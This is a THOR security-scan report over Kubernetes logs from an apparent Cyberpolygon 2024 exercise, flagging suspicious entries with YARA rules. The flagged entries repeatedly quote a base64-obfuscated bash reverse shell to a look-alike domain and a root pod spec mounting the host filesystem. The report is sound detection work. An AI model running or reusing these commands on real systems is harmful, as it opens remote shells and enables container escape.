RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators

Warning 10
Sep 10 18:39:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"moI_uJEBNKI3r7qcaSsw","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:22.150Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzMwMzI5MjQ6MTY0Nzgw\", \"pid\":164780, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/usr/bin/base64\", \"arguments\":\"-d\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:20.403096678Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://11c3efd882aa61732eccba3bdd9d6db3cc4128c22036953fd9609d43620c277b\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"pid\":8}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"11c3efd882aa61732eccba3bdd9d6db\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzIxNDUwMDY6MTY0NzYw\", \"tid\":164780}, \"parent\":{\"exec_[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]bdd9d6db3cc4128c22036953fd9609d43620c277b","name":"mlops-metrics","pid":8,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4NzE5MzMwMzI5MjQ6MTY0Nzgw"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\"","pid":164760,"cwd":"/home/utils","start_time":"2024-09-03T14:17:20.402209123Z","docker":"11c3efd882
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators

Warning 11
Sep 10 18:39:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"bII_uJEBNKI3r7qcaSsv","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:22.150Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzMwNTIzMzE6MTY0Nzgx\", \"pid\":164781, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/bash\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:20.403116085Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://11c3efd882aa61732eccba3bdd9d6db3cc4128c22036953fd9609d43620c277b\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"pid\":9}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"11c3efd882aa61732eccba3bdd9d6db\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzIxNDUwMDY6MTY0NzYw\", \"tid\":164781}, \"parent\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4N[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]rics","pid":9,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4NzE5MzMwNTIzMzE6MTY0Nzgx"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\"","pid":164760,"cwd":"/home/utils","start_time":"2024-09-03T14:17:20.402209123Z","docker":"11c3efd882aa61732eccba3bdd9d6db","parent_exec_id":"azhzLW5vZGUwMTo5NzA
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators

Warning 12
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"rYI-uJEBNKI3r7qc8xbx","_score":1,"_source":{"@timestamp":"2024-09-03T14:16:49.946Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"9d73066b-0f58-4778-8e79-7f199f2e21e2\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods?fieldManager=kubectl-client-side-apply\\u0026fieldValidation=Strict\",\"verb\":\"create\",\"user\":{\"username\":\"system:serviceaccount:prod:prod-pod-creator\",\"uid\":\"09efc0da-119d-4977-bfa3-a2036547d714\",\"groups\":[\"system:serviceaccounts\",\"system:serviceaccounts:prod\",\"system:authenticated\"],\"extra\":{\"authentication.kubernetes.io/pod-name\":[\"mercury-mlflow-6f9d898884-ddtt9\"],\"authentication.kubernetes.io/pod-uid\":[\"dbd80eda-95e5-4b05-86e0-b649bf8733ba\"]}},\"sourceIPs\":[\"10.244.85.228\"],\"userAgent\":\"kubec[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...]am/utils\",\"args\":[\"sh\",\"-c\",\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"],\"resources\":{},\"volumeMounts\":[{\"name\":\[...]bels\\\":{\\\"app\\\":\\\"mlops-metrics\\\"},\\\"name\\\":\\\"mlops-metrics\\\",\\\"namespace\\\":\\\"prod\\\"},\\\"spec\\\":{\\\"containers\\\":[{\\\"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\\"name\\\":\\\"mlops-metrics\\\",\\\"securityContext\\\":{\\\"runAsUser\\\":0},\\\"volumeMounts\\\":[{\\\"mountPath\\\":\\\"/host\\\",\\\"name\\\":\\\"hostvolume\\\"}]}],\\\"volumes\\\":[{\\\"hostPath\\\":{\\\"path\\\":\\\"/\\\",\\\"type\\\":\\\"Directory\\\"},\\\"name\\\":\\\"hostvolume\\\"}]}}\\n\"},\"managedFields\":[{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersio
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators

Notices

Notice 1
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.

Notice 2
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.

Notice 3
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.

Notice 4
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.

Notice 5
Sep 10 18:40:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.

Notice 6
Sep 10 18:47:10 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Report
MESSAGE:
Thor Scan finished
END_TIME:
Tue Sep 10 18:47:10 2024
ALERTS:
0
WARNINGS:
12
NOTICES:
5
ERRORS:
0